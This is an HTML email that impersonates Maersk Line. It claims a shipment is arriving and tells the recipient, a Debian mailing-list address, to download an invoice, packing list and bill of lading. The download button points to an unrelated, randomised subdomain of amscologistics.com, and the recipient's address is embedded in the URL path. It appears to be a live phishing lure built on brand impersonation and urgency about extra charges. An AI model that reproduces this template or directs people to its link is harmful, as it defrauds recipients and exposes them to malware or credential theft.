<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Shipping Documents and Arrival Notice</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4; /* Light grey background for the entire page */
        }
        .notification-box {
            border: 3px solid #000; /* Thick black border */
            padding: 20px;
            margin: 20px auto; /* Center-align the box */
            max-width: 600px;
            background-color: #ffffff; /* White background color */
            border-radius: 5px;
            color: #333; /* Text color */
            text-align: left; /* Ensure text alignment is left */
        }
        .notification-box h2 {
            margin-top: 0;
            font-size: 1.5em;
            color: #000; /* Header color */
        }
        .notification-box p {
            margin: 0 0 10px;
        }
        .notification-box ul {
            margin: 0 0 10px;
            padding-left: 20px;
        }
        .notification-box a {
            text-decoration: none;
        }
        .notification-box a:hover {
            text-decoration: underline;
        }
        .logo {
            text-align: center;
            margin-bottom: 20px;
        }
        .logo img {
            max-width: 150px; /* Adjust size as needed */
            height: auto;
        }
        .download-button {
            display: inline-flex;
            align-items: center;
            padding: 10px 20px;
            margin-top: 10px;
            background-color: #42B0D5; /* Updated background color */
            color: #fff; /* White text color for contrast */
            text-align: center;
            text-decoration: none;
            border-radius: 5px;
            font-weight: bold; /* Make text bold */
            border: none;
            cursor: pointer; /* Change cursor to pointer for better UX */
        }
        .download-button:hover {
            background-color: #3391b8; /* Slightly darker shade of blue on hover */
        }
        .download-button img {
            vertical-align: middle;
            margin-right: 8px; /* Space between icon and text */
            width: 20px; /* Set appropriate size for the icon */
            height: 20px; /* Set appropriate size for the icon */
        }
    </style>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
</head>
<body style="font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4; /* Light grey background for the entire page */">
    <div style="border: 3px solid #000; /* Thick black border */
            padding: 20px;
            margin: 20px auto; /* Center-align the box */
            max-width: 600px;
            background-color: #ffffff; /* White background color */
            border-radius: 5px;
            color: #333; /* Text color */
            text-align: left; /* Ensure text alignment is left */" class="notification-box">
        <div style="text-align: center;
            margin-bottom: 20px" class="logo">
            <img style="max-width: 150px; /* Adjust size as needed */
            height: auto" alt="Company Logo" src="cid:msk1.png" width="222" height="52">
        </div>
        <h2 style="margin-top: 0;
            font-size: 1.5em;
            color: #000; /* Header color */">Important: Shipping Documents and Arrival Notice</h2>
        <p style="margin: 0 0 10px">Dear Consignee <strong>(pkg-puppet-devel@lists.alioth.debian.org)</strong>,</p>
        <p style="margin: 0 0 10px">We are pleased to notify you that your shipment is set to arrive at the Port of Discharge soon. To ensure a seamless delivery process and prevent any additional charges, please review and act upon the following information at your earliest convenience.</p>
        <p style="margin: 0 0 10px">Enclosed are the essential details of your consignment, along with conditions of release and any possible outstanding charges:</p>
        <ul style="margin: 0 0 10px;
            padding-left: 20px">
            <li><strong>Commercial Invoice</strong></li>
            <li><strong>Packing List</strong></li>
            <li><strong>Bill of Lading</strong></li>
            <li><strong>Customs Reference Number or other Customs-related instructions</strong></li>
        </ul>
        <p style="margin: 0 0 10px">
            <a style="display: inline-flex;
            align-items: center;
            padding: 10px 20px;
            margin-top: 10px;
            background-color: #42B0D5; /* Updated background color */
            color: #fff; /* White text color for contrast */
            text-align: center;
            text-decoration: none;
            border-radius: 5px;
            font-weight: bold; /* Make text bold */
            border: none;
            cursor: pointer; /* Change cursor to pointer for better UX */" class="download-button" href="https://cbjrdulhydkjreg.amscologistics.com/gueffoernvmogga/yryyaugltbsyj/Zpzmtebmpibuxwe89g0xmaersk/camdpghyrflwin/oiwgtyaszwm/pkg-puppet-devel/xjzjvbpqwfr/lists.alioth.debian.org/dvehnnofzxom8" download="">
                <img style="vertical-align: middle;
            margin-right: 8px; /* Space between icon and text */
            width: 20px; /* Set appropriate size for the icon */
            height: 20px; /* Set appropriate size for the icon */" alt="PDF Icon" src="cid:2.png" width="22" height="21"> DOWNLOAD DOCUMENTS
            </a>
        </p>
        <p style="margin: 0 0 10px">Should you find any discrepancies or have any questions about the documents, please reach out to us without delay. We are dedicated to providing prompt assistance with any issues you may encounter.</p>
        <p style="margin: 0 0 10px">Thank you for your prompt attention to this matter.</p>
        <p style="margin: 0 0 10px">
            <br>
            <strong>MAERSK LINE</strong><br>
            <br>
            <img alt="Footer Image" src="cid:msk2(1).png" width="561" height="9">
        </p>
    </div>
</body>
</html>